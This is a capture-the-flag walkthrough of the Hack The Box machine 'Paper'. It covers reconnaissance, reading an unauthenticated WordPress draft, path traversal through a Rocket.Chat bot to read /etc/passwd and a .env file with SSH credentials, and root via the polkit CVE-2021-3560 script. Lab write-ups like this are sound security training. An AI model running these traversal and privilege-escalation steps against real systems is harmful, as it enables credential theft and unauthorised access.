Paper — Hackthebox Walkthrough
This was a box where I learned the importance of enumeration. I really loved the realism of the box and the exploitation chain.
User
As usual, starting with nmap gave me 3 open ports.
nmap -sV -sC 10.10.11.143
PORT STATE SERVICE REASON VERSION
22/tcp open tcpwrapped syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
443/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/organizationalUnitName=ca-3899279223185377061/emailAddress=root@localhost.localdomain
Visiting port 80 showed the default CentOS test page.
Looking at the server response headers, one of them specified the backend server as office.paper.
NOTE: "You can also find this out by using curl with the -I option."
Adding the entry to my hosts file and visiting the domain, we see a WordPress installation.
echo "10.10.11.143 office.paper" | sudo tee -a /etc/hosts
Running wpscan against the site told me the WordPress version.
wpscan --url http://office.paper
Googling around, I found a vulnerability that lets me read saved drafts unauthenticated.
As mentioned, I was able to read a saved draft by setting the static parameter to 1 in the URL.
http://office.paper/?static=1
The draft mentions a new vhost, chat.office.paper. Adding this to the hosts file and visiting it gives us a chat application called "Rocket.Chat".
As mentioned, we need a secret registration link to register. We got that from the draft we saw in WordPress, so we can use it to register as a user.
http://chat.office.paper/register/8qozr226AhkCHZdyY
After registering and logging in, we can see that there is a general channel which we have read access to. Looking at the chat history, we can see that there is a server bot named "recyclops".
In the chat we can also see how to use the bot, and that we can list and read files through it.
So we can try to use the bot to list the files on the server. First we have to start a conversation with the bot.
Then with this command we can list the files in the present directory.
recyclops list .
I was able to read the /etc/passwd file with this command.
recyclops file ../../../etc/passwd
We can list the files in one directory up with this.
recyclops list ..
I saw a directory named hubot which sounded interesting. Listing the files inside that directory, I saw a .env file was there.
And I was able to find the credentials of the dwight user in /hubot/.env.
recyclops file ../hubot/.env
user: dwight
pass: Queenofblad3s!23
Then I sshed in as dwight with these credentials.
Root
Running linpeas as dwight, right away I saw the box is vulnerable to CVE-2021-3560.
NOTE: "Make sure to run the updated linpeas, the old one won't catch this."
This vulnerability abuses functionality in polkit. Googling around, I found a script that automates the exploitation.
With this script, I was able to add a new user with sudo privileges. I ran the script as follows, which added a new user named test with the password test.
./k.sh -u=test -p=test
Then I logged in as test and used sudo su to get a root shell.
Rooted!
Contact me through social media:
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄